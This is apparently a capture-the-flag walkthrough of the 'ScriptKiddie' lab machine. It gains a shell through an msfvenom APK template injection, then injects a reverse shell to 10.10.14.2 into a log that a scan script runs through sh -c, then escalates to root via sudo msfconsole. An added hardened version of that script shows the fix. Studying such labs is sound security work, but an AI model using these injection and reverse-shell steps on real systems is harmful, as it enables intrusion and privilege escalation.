2 :5000

Looking at it for quite some time, it's definitely some kind of file upload vuln. The uploaded file needs to be some kind of template.

https://www.exploit-db.com/exploits/49491

$ msfconsole -q; use unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection

# generate apk file and upload
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.226] 50078
whoami
kid

cd /home
ls -la
ls -la
total 16
drwxr-xr-x  4 root root 4096 Feb  3 07:40 .
drwxr-xr-x 20 root root 4096 Feb  3 07:40 ..
drwxr-xr-x 11 kid  kid  4096 Feb  3 11:49 kid
drwxr-xr-x  6 pwn  pwn  4096 Feb  3 12:06 pwn

cd pwn
cat scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi


kid@scriptkiddie:/home/pwn$ echo "  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/1337 0>&1' #" >> /home/kid/logs/hackers

$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.226] 44962
bash: cannot set terminal process group (876): Inappropriate ioctl for device
bash: no job control in this shell
whoami
whoami
pwn
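
The appended log line ran as pwn because scanlosers.sh pastes everything from the third space-separated field into an `sh -c` string. A hardened version of that loop follows, added here as an example and not part of the original notes or the box's script. The log line format in `sample_log` and the `SCANNER` override are assumptions.

```shell
#!/bin/sh
# Added example: hardened variant of the scanlosers.sh loop (not the box's script).
# Assumption: log lines look like "[date time] ip"; SCANNER is a hypothetical override.

# Succeeds only for a dotted quad with four numeric octets, each 0-255.
# The body runs in a subshell, so the IFS change does not leak to the caller.
is_ipv4() (
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;   # digits and single dots only
    esac
    IFS=.
    set -- $1                                  # split on dots into $1..$n
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ ${#octet} -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
)

# Same field selection as the original (cut -f3-), but every value is validated.
extract_targets() {
    cut -d' ' -f3- | sort -u | while IFS= read -r ip; do
        if is_ipv4 "$ip"; then printf '%s\n' "$ip"; fi
    done
}

# No `sh -c`: the target is passed as a single quoted argument, so nothing
# read from the log is ever parsed as shell syntax.
scan_targets() {
    while IFS= read -r ip; do
        "${SCANNER:-nmap}" --top-ports 10 -oN "recon/${ip}.nmap" "$ip" >/dev/null 2>&1 &
    done
    wait
}

# Constructed sample log: two valid entries, one injected line, one bad octet.
sample_log() {
    cat <<'EOF'
[2021-02-03 12:00:01.000001] 10.10.14.2
[2021-02-03 12:00:02.000002] 10.10.14.2
  ;id #
[2021-02-03 12:00:03.000003] 10.10.14.999
EOF
}

sample_log | extract_targets   # prints 10.10.14.2
```

In the real script the pipeline would be `extract_targets < "$log" | scan_targets`. The log directory should also not be writable by a lower-privileged user.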

sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

sudo msfconsole -q
/bin/bash
stty: 'standard input': Inappropriate ioctl for device
[*] exec: /bin/bash

whoami
root
